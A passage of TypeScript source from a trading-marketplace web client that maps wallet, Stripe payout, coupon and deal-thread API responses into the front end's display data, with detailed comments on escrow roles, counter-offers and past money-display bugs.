  /** The server's canonical seller-side held proceeds — see
   *  ApiWalletResponse.pendingEscrowTotal. Deliberately NOT wired into the hero
   *  badge; see walletFixups.ts for why that badge keeps its own sum. */
  pendingEscrowTotal: number;
  /** Did GET /api/stripe/payouts actually answer? `false` means the call failed
   *  and every payouts-derived field below it is a DEFAULT, not a reading — the
   *  distinction mapWallet's `?? 0` / `?? false` otherwise destroys. */
  payoutsLoaded: boolean;
}

/** The four gamification fields renderWallet and renderRepDash dereference off
 *  USERS[store.me], plus the pre-formatted string renderProfile uppercases. */
export interface DemoWalletIdentity {
  lvl: number;
  /** Always true here: the server computed `lvl` from lifetime points. */
  lvlKnown: boolean;
  pts: number;
  ptsNext: number;
  streak: number;
  points: string;
}

/**
 * Pure, so every mapping decision above is testable without a network or a
 * DOM. The three best-effort responses are nullable: a failure on any of them
 * degrades that SECTION to Blake's own empty state and never blocks the rest.
 */
export function mapWallet(input: {
  wallet: ApiWalletResponse;
  payouts: ApiPayoutsResponse | null;
  promoCredit: ApiPromoCredit | null;
  coupons: ApiShippingCoupon[] | null;
  myUserId: string;
}): { wallet: DemoWallet; me: DemoWalletIdentity } {
  const { wallet, payouts, promoCredit, coupons, myUserId } = input;

  const held = wallet.escrowTransactions.filter((tx) => tx.status === "held");
  const past = wallet.escrowTransactions.filter((tx) => tx.status !== "held");
  const creditExpires = formatDate(promoCredit?.expiresAt);

  return {
    wallet: {
      spendable: wallet.pointsWallet,
      accumulated: wallet.totalAccumulatedPoints,
      // ?? 0 and never left bare: money2(undefined / 100) paints "$NaN".
      availableCents: payouts?.availableCents ?? 0,
      cards: [],
      bank: {
        connected: payouts?.payoutsEnabled ?? false,
        institutionName: "",
        last4: "",
        connectedAt: "",
      },
      promoCredit: {
        balance: (promoCredit?.balanceCents ?? 0) / 100,
        // "" and never null: a null paints the literal "Redeemed null".
        redeemed: promoCredit?.issuedAt ? formatDate(promoCredit.issuedAt) : "",
        // 2026-10-05 (card 1219177863701651): which campaign this one row is,
        // so app.js can title a List & Earn credit as one, and the formatted
        // expiry the promotion page quotes. Both "" when absent, by the same
        // rule: campaignId is compared, so a null and a missing id must read
        // alike, and expires is painted. An expiry that will not parse is no
        // expiry, never formatDate's placeholder ("It expires —.").
        campaignId: promoCredit?.campaignId ?? "",
        expires: creditExpires === EMPTY_DATE ? "" : creditExpires,
      },
      coupons: (coupons ?? []).map((c) => ({
        id: c.id,
        label: c.discountType === "full" ? "Free Shipping" : "50% Off Shipping",
        // Blake branches on this EXACT string for the gold/zap treatment
        // (c.badge === "100% OFF"), so it is a literal, not a formatted
        // percentage.
        badge: c.discountType === "full" ? "100% OFF" : "50% OFF",
        expires: formatDate(c.expiresAt),
      })),
      escrowHeld: held.map((tx) => ({
        id: tx.id,
        title: tx.listingTitle,
        withHandle: tx.counterpartUsername,
        amount: tx.amount,
        when: formatMonthDay(tx.createdAt),
        // Decides which control Blake renders: a buyer gets the "I received
        // this, release funds" button, a seller gets the waiting note. Getting
        // this backwards would offer the SELLER a button that releases their
        // own escrow to themselves.
        role: tx.buyerId === myUserId ? "buyer" : "seller",
      })),
      escrowPast: past.map((tx) => ({
        id: tx.id,
        title: tx.listingTitle,
        amount: tx.amount,
        status: tx.status === "released" ? "RELEASED" : "REFUNDED",
        // His fixture carries the verb INSIDE the string ("Released Aug 12"),
        // not as a separate label.
        when:
          (tx.status === "released" ? "Released " : "Refunded ") +
          formatMonthDay(tx.releasedAt ?? tx.createdAt),
      })),
      payouts: (payouts?.payouts ?? []).map((p) => ({
        id: p.id,
        // Stripe's description is usually null. "Bank deposit" describes what a
        // Stripe payout IS, rather than inventing a sales count for it.
        title: p.description || "Bank deposit",
        amount: p.amountCents / 100,
        // Blake gilds "PAID" and ambers everything else. Passing Stripe's own
        // word through, uppercased, keeps in_transit and failed honest instead
        // of flattening them into one of his two fixture values.
        status: p.status === "paid" ? "PAID" : p.status.toUpperCase(),
        when: formatMonthDay(p.arrivalDate),
      })),
      /* READ, never re-derived. The temptation is `held.reduce(...)`, which is
         a DIFFERENT number: `held` mixes buyer- and seller-role rows by design
         (see `role` above), and pendingEscrowTotal is seller-only by design.
         Summing here would produce a third figure agreeing with neither the
         server nor the payouts screen. */
      pendingEscrowTotal: wallet.pendingEscrowTotal ?? 0,
      /* The tri-state collapse this file's `?? 0` / `?? false` above cannot
         express on its own: `payouts === null` is a FAILED fetch, and a failed
         fetch currently renders identically to a successful one that returned
         zero and disconnected. One boolean carries the difference through. */
      payoutsLoaded: payouts !== null,
    },
    me: {
      lvl: wallet.level,
      lvlKnown: true,
      pts: wallet.totalAccumulatedPoints,
      // At MAX_LEVEL this equals pts, the documented maxed case above.
      ptsNext: wallet.nextLevelPoints ?? wallet.totalAccumulatedPoints,
      streak: wallet.streakDays,
      points: wallet.pointsWallet.toLocaleString() + " pts",
    },
  };
}

/**
 * Fetches the wallet and installs it through the bridge. BEST-EFFORT as a
 * whole, the same posture as categoryCounts and the collection-items pass,
 * because the bridge has already written a fully-shaped zeroed WALLET at boot
 * and so a failure here degrades to Blake's honest empty states rather than to
 * a crash. It must never join installFloorListings in failing the boot closed:
 * an unreachable wallet is not a reason to withhold the floor.
 *
 * Only ONE of the four calls is required. The other three each degrade their
 * own section independently, so a Stripe outage costs the payout list and not
 * the points balance.
 *
 * ⚠️ Called at boot today, which costs up to four round trips for a screen the
 * visitor may never open. Deliberate for now and NOT the end state: the same
 * lazy argument the lane made for carrier tracking applies here, and the bridge
 * sibling is written to stay callable for the life of the tab precisely so this
 * can move behind a #/wallet navigation later without touching the mapper.
 */
export async function installWallet(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId: string,
): Promise<boolean> {
  const bridge = (
    win as unknown as {
      __gbzInstallWallet?: (w: DemoWallet, me: DemoWalletIdentity) => void;
    }
  ).__gbzInstallWallet;
  if (typeof bridge !== "function") {
    throw new Error("installWallet: bridge script has not run yet (__gbzInstallWallet missing)");
  }

  /** One attempt, silent degrade, no retry loop: this file's existing
   *  best-effort posture. Returns null on any failure, which every consumer
   *  above maps to Blake's own empty state for that section. */
  const optional = async <T>(url: string): Promise<T | null> => {
    try {
      const res = await authFetch(url);
      if (!res.ok) return null;
      return (await res.json()) as T;
    } catch {
      return null;
    }
  };

  const walletRes = await authFetch("/api/users/me/wallet");
  if (!walletRes.ok) {
    console.warn(
      "[web-install] wallet: GET /api/users/me/wallet failed (" +
        walletRes.status +
        ") - leaving the zeroed shape the bridge already installed",
    );
    return false;
  }
  const wallet = (await walletRes.json()) as ApiWalletResponse;

  const [payouts, promoCredit, coupons] = await Promise.all([
    optional<ApiPayoutsResponse>("/api/stripe/payouts"),
    optional<ApiPromoCredit>("/api/users/me/promo-credit"),
    optional<ApiShippingCoupon[]>("/api/users/me/shipping-coupons"),
  ]);

  const mapped = mapWallet({ wallet, payouts, promoCredit, coupons, myUserId });
  bridge(mapped.wallet, mapped.me);
  return true;
}

/* ══════════════════════════════════════════════════════════════════════════
   THE DEALS LIST (transactional lane, Asana 1217761486129536)

   renderDeals() reads THREADS, and it ALWAYS renders a detail pane alongside
   the list — 'const sel = list.find(...) || list[0]' — so renderThread runs on
   the same pass. Everything renderThread dereferences must therefore be shaped
   from the moment the list installs, not when a thread is opened.

   🔴 THE ONE THAT DECIDES THE DESIGN: renderThread's second line is
   'const u = USERS[t.with]', and three lines later it reads 'u.level' and
   'u.trades' with NO guard. USERS is populated from the listings feed, so a
   deal counterpart who has no live listing on the floor is simply absent from
   it and the whole deals view throws. (Blake DOES guard USERS[t.with] at
   app.js:1859, in the chat-only branch — he guarded the cheap read and not the
   load-bearing one.) So installing deals MUST also merge every counterpart into
   USERS, which is why this pass emits users as well as threads.

   ⚠️ THREADS IS NOT ONLY #/deals. app.js:718-724 renders signed-in HOME deal
   cards off THREADS.filter(t => t.act && t.tab === 'active'), reading
   t.theirs.items[0] unguarded and calling t.cta.toUpperCase(). So `cta` must be
   a STRING or null — never the server's DealCta object — and `theirs` must
   always be an object carrying an items ARRAY.

   WHAT THIS PASS DELIBERATELY LEAVES EMPTY, all of them guarded by his own
   code, all of them per-thread work that belongs to the detail pass:

     fees             feeBlock() opens 'const f = t.fees; if (!f) return ""'.
                      A real breakdown is one live-Shippo call per offer
                      (GET /api/offers/:id/trade-checkout-summary) and the list
                      response carries no fee fields at all. N calls to paint a
                      list is the same trade the lane already refused for
                      carrier tracking.
     tracking         Guarded at :3327, :3340 and :4698. Carrier scans DO live
                      in our own tracking_events table (webhook-populated, three
                      indexes) rather than needing live Shippo reads — correcting
                      the lane contract §9 — but deal-threads.ts does not query
                      it yet.
     incomingDispute  Guarded at :1863. Peer disputes are support_tickets, and
                      Blake's `ref` field has NO backing column; the ruling is to
                      omit it rather than mint a case number a human would quote
                      back at us.
     msgs / history   Arrays, NOT null: threadRow() reads
                      't.msgs[t.msgs.length - 1]' unguarded on the list pass.
                      Populated from the events endpoint in the detail pass.
   ══════════════════════════════════════════════════════════════════════════ */

/** GET /api/deal-threads — one row per COUNTERPART, carrying deals[]. */
export interface ApiDealThreadRow {
  key: string;
  /** createdAt is the counterpart's join date, on the wire since 2026-08-26 —
   *  optional here because a response predating it, or any fixture written
   *  before it, is still a valid row. */
  counterpart: { id: string; username: string | null; avatar: string | null; createdAt?: string | null };
  deals: ApiDealEntry[];
  dealCount: number;
  actNeeded: boolean;
  /** A per-participant read FLAG. Not a count — see the unread note below. */
  unread: boolean;
  activityAt: string;
  /** The newest line the OTHER person wrote in this row's conversation, leaving out
   *  the system lines both clients hide; null when there is none (deal-threads.ts
   *  :282-286, :586). Part of the Deals order's key; activityAt is not, because it
   *  counts the visitor's own lines and offers too. Optional: older fixtures and
   *  responses predate it. */
  lastReceivedAt?: string | null;
  /** The pair's newest event, as raw facts (deal-threads.ts 272-277, built 551-562): the newest message in
   *  EITHER direction with its raw body (a plain line, a "[Shared listing: id]" token, an "[Offer: ...]" chip or
   *  the acceptance message), or the newest offer activity when that is newer; null when the pair has neither.
   *  The same value on every row of the person. mapDealThread turns it into the row's words (previewLine).
   *  Optional: older fixtures predate it. */
  preview?: { type: "message"; body: string; senderId: string } | { type: "offer"; listingId: string } | null;
}

export interface ApiDealEntry {
  /** declaredValue/cashPrice are on the wire as of 2026-08-26 (deal-threads.ts's
   *  list-route `listingRows` select). Both nullable — a deleted listing has
   *  neither, and the route says so with null rather than 0. */
  listing: { id: string; title: string | null; image: string | null; declaredValue: number | null; cashPrice: number | null };
  offer: {
    id: string;
    listingId: string;
    /** Canonical direction: from = buyer, to = seller, counters included. */
    fromUserId: string;
    toUserId: string;
    /** 🔴 THE COUNTER-OFFER GAP (2026-08-27). Countering creates a NEW pending
     *  row that keeps the CANONICAL fromUserId/toUserId (buyer/seller roles,
     *  never move) — the actual AUTHOR of this specific proposal is here,
     *  null on an original (never-countered) offer, where fromUserId is
     *  already the author (offers.ts:940-955, pinned by
     *  counterOfferFlow.test.ts:356-360). Server's own openness rule reads
     *  the same way (deal-threads.ts:322-325): author = proposedByUserId ??
     *  fromUserId. `iAmBuyer` (fromUserId-derived) answers "whose money/
     *  listing is on which side" and must never be used for "who owes a
     *  response" — that split is `author`/`iSentIt` below, in mapDealThread. */
    proposedByUserId: string | null;
    status: string;
    offerType: string;
    /** Dollars on the wire, and it belongs to the BUYER's side. */
    cashAmount: number | null;
    /** 🔴 Buy Now only: cashAmount is then the buyer's GROSS (item + fees +
     *  shipping + tax), which the seller must never be shown as what the buyer
     *  "gives". sellerCashProceeds is the server's seller figure (dollars,
     *  computeOfferBreakdown). Both OPTIONAL: a server that predates them sends
     *  neither, and the mapper then reads cashAmount exactly as before. */
    isBuyNow?: boolean;
    sellerCashProceeds?: number;
    /**
     * Dollars, and it belongs to the SELLER's side — cash the buyer asks the
     * seller to add to balance an uneven trade.
     *
     * 🔴 DECLARED LATE, 2026-09-28, AND THE OMISSION COST REAL MONEY. It was
     * always on the wire (both deal-threads routes select offers rows whole),
     * but this type did not name it and the mapper handed the seller's side a
     * hardcoded 0. So a $50 request rendered as a straight swap on both people's
     * rows, ledgers and history, the seller accepted that card, and unified
     * checkout charged them the cash leg anyway (tradeCheckout.ts).
     *
     * ⚠️ NAMING IT HERE DOES NOT POLICE THE FIXTURES, and it is worth knowing
     * why not. This tsconfig excludes `**\/*.test.ts`, so no test file in this
     * artifact is in the typecheck program at all — verified with
     * `tsc --listFiles`. A fixture that omits this field compiles, runs, reads
     * undefined and defaults to 0, which is exactly the old wrong behaviour
     * wearing the new type. The type protects the MAPPERS, which are source; the
     * only thing protecting the fixtures is a test that asserts the figure, and
     * that is dealThreadRequestedCash.test.ts.
     */
    requestedCashAmount: number | null;
    createdAt: string;
    /** offers.updatedAt: the row's last write of any kind (a counter supersedes, an accept, a checkout, a label,
     *  every tracking event), sent with the rest of the latest offer row, the same column the events route
     *  ships on each offer event. Named here (2026-10-21) for the open-thread poll's stale-list check only
     *  (mapDealThread stamps it as __gbzListUpdatedAt); NEVER for the Deals order, which theirSentMs explains.
     *  Optional: a fixture or a response that predates it reads as unknown, never as a difference. */
    updatedAt?: string;
    /** offers.acceptedAt: set once, at accept (lib/db/src/schema/offers.ts:270-277),
     *  and sent with the rest of the latest offer row (deal-threads.ts:524-527). Null
     *  until then. Migration 066, which added it, backfilled it from updated_at on
     *  rows that were accepted and still in flight; rows that had already completed
     *  or been canceled keep null (docs/migration-archive/lib-db-migrations/
     *  066_deal_state_fields.sql:19-26). A Buy Now row has none at all: escrow.ts
     *  inserts it already accepted, with no acceptedAt and no proposedByUserId.
     *  Read with createdAt for the Deals order: see theirSentMs in mapDealThread.
     *  Optional for older fixtures. */
    acceptedAt?: string | null;
    /** 'sheet' | 'exchange' — where this offer was composed. Part of the offers
     *  row the list route sends whole, and load-bearing here for one reason:
     *  the wire carries only the OFFERED (buyer) side of an offer's items
     *  (offeredItems.ts filters side='offered'), so an exchange-composed offer
     *  may hold a REQUESTED side the web cannot see. See viaExchange below. */
    origin?: string | null;
    offeredItems?: ApiDealOfferedItem[];
  };
  offerCount: number;
  actNeeded: boolean;
  /** dealState.rowStatus() — the state machine's own output. */
  status: { word: string; gold: boolean; deadlineAt: string | null };
  /** dealState.cta(). NULL is normal and common — see the trap below. */
  cta: { kind: string; label: string; gold: boolean; blocked: boolean } | null;
  stepper: { show: boolean; steps: ApiDealStep[] };
}

/**
 * The cash on the BUYER's side of a deal, as the viewer may read it.
 *
 * 🔴 A Buy Now stores the buyer's GROSS in cashAmount (escrow.ts), so the SELLER
 * reading it saw "@buyer GIVES $120.50" on a $100 item — the buyer's whole
 * charge, fees and tax included, presented as what they hand over. The server
 * already knows the seller's figure (sellerCashProceeds, the same number the
 * receipt shows); the buyer's own view, and every deal that is not a Buy Now,
 * keeps reading cashAmount untouched.
 */
function buyerSideCash(
  o: { cashAmount: number | null; isBuyNow?: boolean; sellerCashProceeds?: number },
  iAmBuyer: boolean,
): number {
  if (!iAmBuyer && o.isBuyNow && o.sellerCashProceeds != null) return o.sellerCashProceeds;
  return o.cashAmount ?? 0;
}

export interface ApiDealStep {
  key: string;
  label: string;
  state: "done" | "you" | "wait" | "future";
  /** '48H' | '7D' | 'AUTO 72H' | '' — composed onto the label, see below. */
  windowHint: string;
  subLabel: string;
  deadlineAt: string | null;
}

export interface ApiDealOfferedItem {
  name: string;
  image: string | null;
  declaredValue: number | null;
  itemValue: number | null;
  listingId: string | null;
  position: number;
}

export interface DemoThreadItem {
  title: string;
  image: string;
  lid: string | null;
  /** NULL, not 0, when we do not know it — see mapSide. */
  value: number | null;
}

export interface DemoThreadSide {
  handle: string;
  items: DemoThreadItem[];
  cash: number;
}

export interface DemoThread {
  id: string;
  with: string;
  state: string;
  offerWhen: string;
  /** ISO offer time, for the person timeline's ordering (2026-09-02). */
  offerAt?: string | null;
  offerTime: string;
  act: boolean;
  unread: number;
  tab: "active" | "offers" | "done";
  accepted: boolean;
  sent: boolean;
  chatOnly: boolean;
  incoming: boolean;
  mine: DemoThreadSide;
  theirs: DemoThreadSide;
  cta: string | null;
  fees: null;
  steps: Array<[string, string]> | null;
  tracking: null;
  incomingDispute: null;
  history: never[];
  msgs: never[];
  /** HIS field, not ours: renderThread stamps "sent from the Exchange" on it
   *  and isSimpleOffer routes the Counter button by it. */
  viaExchange?: boolean;
  /** The Deals order's two inputs (app.js dealsOrdered), epoch ms, 0 when absent.
   *  Plain names because app.js reads them; neither occurs in data.js or app.js
   *  otherwise. lastReceivedMs is the PERSON's newest line (copied onto each of
   *  their rows, as unread is); theirSentMs is the newest thing THEY sent on this
   *  deal's latest offer row (see mapDealThread; 0 on the chat-only row, which has
   *  no offer). */
  lastReceivedMs?: number;
  theirSentMs?: number;
  /** Namespaced, ours, not Blake's — see mapDealThread. Absent on the chat-only
   *  row, which has no deal and therefore no side. */
  __gbzIAmBuyer?: boolean;
  /** Namespaced, ours: the id of the offer this row describes, the one whose
   *  status makes `accepted` true. Rewritten by every list read, unlike
   *  __gbzOfferId, which the thread-detail read writes once per tab. disputeFile
   *  files against THIS id, so a counter accepted in the app after the detail
   *  loaded cannot leave a dispute on the superseded offer while the accepted
   *  one pays out. Absent on the chat-only row. */
  __gbzListOfferId?: string;
  /** Namespaced, ours: the list row's head offer STATUS and UPDATED-AT, as the list last sent them, beside the
   *  id above. The open-thread poll compares the three with the chain's latest offer in the events body to tell
   *  that the list (the only source of the card's state word, gold flag, CTA, stepper, tab and sides) has gone
   *  stale, and reads it again (dealThreadPoll.ts listIsStale). Rewritten by every list read, as the id is.
   *  Absent on the chat-only row. */
  __gbzListStatus?: string;
  __gbzListUpdatedAt?: string;
  /** The row's last line as WORDS, from the list's preview (see mapDealThread), in the shape app.js personRow
   *  reads from a message: `from` is "me" for the visitor's own line, else the person's handle. The same on every
   *  row of the person; null when the list has no preview. Absent on the demo's rows (data.js). */
  previewLine?: { from: string; text: string } | null;
  /** The server's ISO time of the pair's newest event (deal-threads.ts 280-281, set at 585: the max of all the
   *  counterpart's offers' updatedAt and the conversation's lastMessageAt), the event the preview describes. The
   *  same on every row of the person. app.js rowLine shows a loaded line over the preview when the line is
   *  strictly newer than this, OR is the composer's pending line, OR the list carries no preview. Absent on the
   *  demo's rows (data.js). */
  activityAt?: string;
}

/**
 * Blake's tab vocabulary, from the RAW offer status rather than the display
 * word.
 *
 * Deliberately not derived from status.word. That vocabulary has seventeen
 * members against his three tabs, so mapping it would mean writing and
 * maintaining a translation table — and the lane's standing rule is not to
 * invent a vocabulary when the underlying fact is already on the wire. Offer
 * status IS the fact: pending means an offer is open, accepted means a deal is
 * in flight, everything else is finished.
 */
function dealTab(offerStatus: string): DemoThread["tab"] {
  if (offerStatus === "pending") return "offers";
  if (offerStatus === "accepted") return "active";
  return "done";
}

/**
 * One side's items and cash.
 *
 * A null `value` on an item row hands the number back to Blake: sideLedger
 * (app.js:1836) reads `it.value ?? (l ? l.declaredValue : 0)`, so null makes
 * him look the declared value up in LISTINGS by `lid`. A 0 would satisfy `??`
 * and SUPPRESS that lookup, painting $0 next to a real item.
 */
function mapSide(handle: string, items: DemoThreadItem[], cash: number): DemoThreadSide {
  return { handle, items, cash };
}

/**
 * The LISTING side of a deal, valued from the wire rather than left to Blake's
 * lookup.
 *
 * 🔴 CORRECTED 2026-08-26. This used to emit `value: null` on every listing
 * item, on the reasoning above: null makes sideLedger fall back to
 * `LISTINGS.find(x => x.id === it.lid).declaredValue`. That fallback is real
 * and it MISSES on exactly the deals that carry money.
 *
 *   · LISTINGS only ever holds `status: "active"` rows — GET /api/listings'
 *     own `eq(listings.status, "active")` (listings.ts), installed by
 *     installFloorListings.
 *   · Accepting an offer locks the listing to `pending`
 *     (lib/listingDisposition.lockListingForTrade).
 *
 * So the moment a deal is accepted, its listing leaves LISTINGS and
 * `l ? l.declaredValue : 0` takes the `: 0` arm — a confident, well-formed
 * `$0` next to a $1,480 guitar. No NaN, no undefined, nothing a shape check
 * can see.
 *
 * `??` and not `||`, and declaredValue before cashPrice: declaredValue is the
 * column Blake's own fallback reads, so preferring it keeps the two agreeing
 * whenever the lookup DOES land; a genuine 0 is a real declared value rather
 * than an absence. Null survives only when the row carries neither (a deleted
 * listing), which is the one case where handing the lookup back is still the
 * best available answer.
 */
function listingSideValue(listing: { declaredValue: number | null; cashPrice: number | null }): number | null {
  return listing.declaredValue ?? listing.cashPrice ?? null;
}

function offeredToItems(offered: ApiDealOfferedItem[] | undefined): DemoThreadItem[] {
  return (offered ?? [])
    // The ruled hero tiebreak (card 1217247158932786): highest declared value
    // first, ties to the OLDEST item, which is what `position` encodes. Blake
    // takes items[0] as the row image, so the order decides which picture the
    // deal shows — array order off the wire is not a substitute.
    .slice()
    .sort((a, b) => (b.declaredValue ?? b.itemValue ?? 0) - (a.declaredValue ?? a.itemValue ?? 0) || a.position - b.position)
    .map((i) => ({
      title: i.name,
      image: safeUrl(i.image),
      lid: i.listingId,
      // ?? and not ||: itemValue is the frozen snapshot taken at offer creation
      // and a genuine 0 is a real declared value, not an absence.
      value: i.declaredValue ?? i.itemValue,
    }));
}

/**
 * One server thread row -> the Blake threads it becomes.
 *
 * ONE THREAD PER DEAL, plus a chat-only row for a counterpart with no offers.
 * His thread is a single deal (one mine/theirs pair); ours is a PERSON carrying
 * deals[]. The alias key format already anticipates the split —
 * `d:<counterpartId>:<listingId>` resolves server-side to person +
 * focusListingId — so the id we emit round-trips to a real thread rather than
 * being a display-only string. Reversible if it reads badly.
 *
 * Returns [] for a counterpart with no username: `t.with` is interpolated into
 * `@${esc(t.with)}` and used as the USERS key, so a nameless person cannot be
 * rendered at all. Dropping the row is the same posture installFloorListings
 * takes for a listing whose category his renderer cannot draw.
 */
export function mapDealThread(row: ApiDealThreadRow, myUserId: string): DemoThread[] {
  const handle = row.counterpart.username;
  if (!handle) return [];
  const withHandle = handle;
  /* The Deals order's inputs (app.js dealsOrdered), as epoch ms, 0 when absent or
     unparseable. The person's last received line rides every row of theirs, the
     way unread does. */
  const epochMs = (iso: string | null | undefined): number => Date.parse(iso ?? "") || 0;
  const lastReceivedMs = epochMs(row.lastReceivedAt);
  /* THE ROW'S LAST LINE, AS WORDS (Blake 2026-10-12 on card 1219177682931853, decisions 1, 2 and 4, and the
     approved plan's plain and shared-listing lines), mirroring the app's inbox (inbox.tsx 484-498). The server's
     preview is the pair's newest event as raw facts, the same on every row of the person; app.js rowLine paints
     it unless a loaded line is strictly newer than that event (activityAt) or is the composer's pending line.
       - a plain line: its body, from "me" when the visitor sent it (personRow puts "You: " first);
       - "[Shared listing: id]": "Shared a listing". The prefix is matched, as the app's inbox does (inbox.tsx
         488); the thread's own SHARED_LISTING_RE needs the exact token, so "[Shared listing: id] and more" reads
         "Shared a listing" here and as its raw text in the pane;
       - an "[Offer: id|type|cash|title|listingId]" chip (offers.ts 1283): "Offer · " + its 4th part;
       - the acceptance message (offerCopy.ts 38), matched by the site's own isAcceptanceDm (the phrase AND the
         "Offers tab" bounce, the same test as the server's isHiddenSystemLine), so a person who types the phrase
         reads as a plain line: "Offer accepted · " + the quoted title (ACCEPTANCE_DM_RE has no group for the
         title, so the title is read with its own pattern);
       - { type: "offer" }: "Offer · " + the title of the deal whose offer it names.
     The chip and the acceptance message are the server's bookkeeping, written as the seller, so they read as the
     person's whoever's account wrote them: never "You: Offer ...". A missing or empty title reads "Listing" (the
     app reads "Listing" only for a null title on an offer preview; its chip reads "Offer details" and its
     acceptance message is shown raw).
     Cut to 200 code points: a surrogate pair is never split; an emoji built from several code points can lose its
     modifier at the cut, which sits far past the CSS ellipsis (styles.css .tr-last; a body can be 4000). */
  const previewLine = ((): DemoThread["previewLine"] => {
    const pv = row.preview;
    if (!pv) return null;
    const line = (from: string, text: string) => ({ from, text: Array.from(text).slice(0, 200).join("") });
    if (pv.type === "offer") {
      const deal = row.deals.find((d) => d.offer.listingId === pv.listingId);
      return line(withHandle, "Offer · " + ((deal?.listing.title ?? "").trim() || "Listing"));
    }
    const mine = pv.senderId === myUserId;
    const body = pv.body ?? "";
    if (body.startsWith("[Shared listing:")) return line(mine ? "me" : withHandle, SHARED_LISTING_FALLBACK);
    if (body.startsWith("[Offer: ")) {
      const parts = body.slice("[Offer: ".length).replace(/\]$/, "").split("|");
      return line(withHandle, "Offer · " + ((parts[3] ?? "").trim() || "Listing"));
    }
    const accepted = isAcceptanceDm(body) ? /Your (?:offer|trade) on "(.*?)" was accepted!/.exec(body) : null;
    if (accepted) return line(withHandle, "Offer accepted · " + (accepted[1].trim() || "Listing"));
    return line(mine ? "me" : withHandle, body);
  })();

  if (row.deals.length === 0) {
    return [
      {
        id: row.key,
        with: withHandle,
        state: "MESSAGE",
        offerWhen: formatMonthDay(row.activityAt),
        offerTime: formatClockTime(row.activityAt),
        act: false,
        unread: row.unread ? 1 : 0,
        lastReceivedMs,
        theirSentMs: 0,
        tab: "active",
        accepted: false,
        sent: false,
        chatOnly: true,
        incoming: false,
        mine: mapSide("me", [], 0),
        theirs: mapSide(withHandle, [], 0),
        cta: null,
        fees: null,
        steps: null,
        tracking: null,
        incomingDispute: null,
        history: [],
        msgs: [],
        previewLine,
        activityAt: row.activityAt,
      },
    ];
  }

  return row.deals.map((d) => {
    // iAmBuyer: CANONICAL buyer/seller role (fromUserId), for money/listing
    // side placement ONLY (mine/theirs below) — this never changes across a
    // counter, by design (offers.ts keeps fromUserId=buyer on every row in a
    // chain). It must NOT be read as "who owes a response right now"; that is
    // author/iSentIt, immediately below, which DOES change on a counter.
    const iAmBuyer = d.offer.fromUserId === myUserId;
    // 🔴 CORRECTED 2026-08-27 (adversarial review). A counter-offer is a NEW
    // pending row whose fromUserId/toUserId stay canonical — the actual
    // author of THIS proposal is proposedByUserId, null only on an original
    // offer (where fromUserId already IS the author). Reading iAmBuyer alone
    // for openness meant a counter YOU sent painted incoming:true (Accept/
    // Counter/Decline on your own offer) whenever you were also the buyer.
    // Same rule the server itself uses (deal-threads.ts:322-325).
    const author = d.offer.proposedByUserId ?? d.offer.fromUserId;
    const iSentIt = author === myUserId;
    const offered = offeredToItems(d.offer.offeredItems);
    const listingItem: DemoThreadItem = {
      title: d.listing.title ?? "",
      image: safeUrl(d.listing.image),
      lid: d.listing.id,
      value: listingSideValue(d.listing),
    };
    const cash = buyerSideCash(d.offer, iAmBuyer);
    /* The SELLER's cash. Not a variant of the line above: the two figures sit on
       opposite sides of the same deal and must never be added or swapped. */
    const requestedCash = d.offer.requestedCashAmount ?? 0;

    return {
      // The alias key: resolves back to this exact person+listing server-side.
      id: `d:${row.counterpart.id}:${d.offer.listingId}`,
      with: withHandle,
      // 🔴 status.word, never the status OBJECT. esc() String-coerces, so an
      // object paints the literal "[object Object]" in the chip rather than
      // throwing — a silent wrong, which is worse.
      state: d.status.word,
      offerWhen: formatMonthDay(d.offer.createdAt),
      /* ISO, for the person timeline's ordering (Blake 2026-09-02): every
         deal's offers and the pair's messages sort on this, as text. */
      offerAt: d.offer.createdAt,
      offerTime: formatClockTime(d.offer.createdAt),
      act: d.status.gold,
      /* 🔴 A COUNT-SHAPED FIELD WITH NO TRUTHFUL COUNT BEHIND IT.
         Blake renders `<span class="tr-unread">${t.unread}</span>` RAW (not
         esc'd) and only when truthy, so a boolean paints the literal word
         "true". conversations tracks a per-participant read FLAG, not
         per-message state, so no real count exists in the schema at all.
         Coerced to 1 here and the numeral is then replaced with a DOT by
         unreadFixups — the only option that neither invents a number nor
         prints "true". Deriving a count from "messages since my last message"
         would be a plausible number with no source. */
      unread: row.unread ? 1 : 0,
      lastReceivedMs,
      /* The newest thing THEY sent on this deal (Blake 2026-10-07: a message, an
         offer, a counter or an accept) that is on THIS row, the chain's latest
         offer row, which is the only one the list sends: the chain's earlier
         offers are not on the wire. Their own proposal: when they made it
         (createdAt; a counter is a new row, so this never moves), whatever has
         happened to it since. The visitor's proposal: when they accepted it
         (acceptedAt), else nothing. So once the visitor counters, the offer they
         countered is gone from here; what keeps that person's place is
         dealsOrdered's highest-seen key (app.js dealsKeySeen). Never updatedAt,
         which moves on any write to the row: a checkout, a label, every tracking
         event. */
      theirSentMs: iSentIt ? epochMs(d.offer.acceptedAt) : epochMs(d.offer.createdAt),
      tab: dealTab(d.offer.status),
      accepted: d.offer.status === "accepted",
      // 🔴 CORRECTED 2026-08-27, twice over. First pass: direction (who sent
      // THIS offer) is not openness (is there a live decision here for the
      // viewer) — both used to be set unconditionally off buyer/seller role,
      // so a finished (cancelled/declined/completed) deal where the viewer is
      // the seller still carried incoming: true. Second pass (adversarial
      // review, same day): "who sent this offer" is not iAmBuyer either, once
      // counters exist — iAmBuyer is the CANONICAL role and never moves, but
      // a counter's real author is author/iSentIt (declared above). Both
      // fields now read author, never fromUserId directly:
      //   sent     — TRUE direction: iSentIt, always (I authored the live
      //              proposal, whether original or my own counter).
      //   incoming — the openness gate: only a proposal someone ELSE
      //              authored, still pending, is something I owe a response
      //              on.
      sent: iSentIt,
      chatOnly: false,
      incoming: !iSentIt && d.offer.status === "pending",
      // The buyer gives cash and their offered items; the seller gives the
      // listing, AND the cash the buyer asked them to add. cash rides the
      // buyer's side in both directions and requestedCash rides the seller's.
      // CANONICAL role (iAmBuyer), deliberately not author/iSentIt: which side
      // of the deal your money/listing sits on does not move when a counter
      // changes who most recently spoke.
      //
      // 🔴 The seller's figure was a hardcoded 0 here until 2026-09-28. That is
      // the whole defect: it made a request for cash invisible to the person
      // being asked for it, on the card they tap Accept on.
      mine: iAmBuyer ? mapSide("me", offered, cash) : mapSide("me", [listingItem], requestedCash),
      theirs: iAmBuyer ? mapSide(withHandle, [listingItem], requestedCash) : mapSide(withHandle, offered, cash),
      /* 🔴 A STRING OR NULL, NEVER THE DealCta OBJECT. app.js:723 (the SIGNED-IN
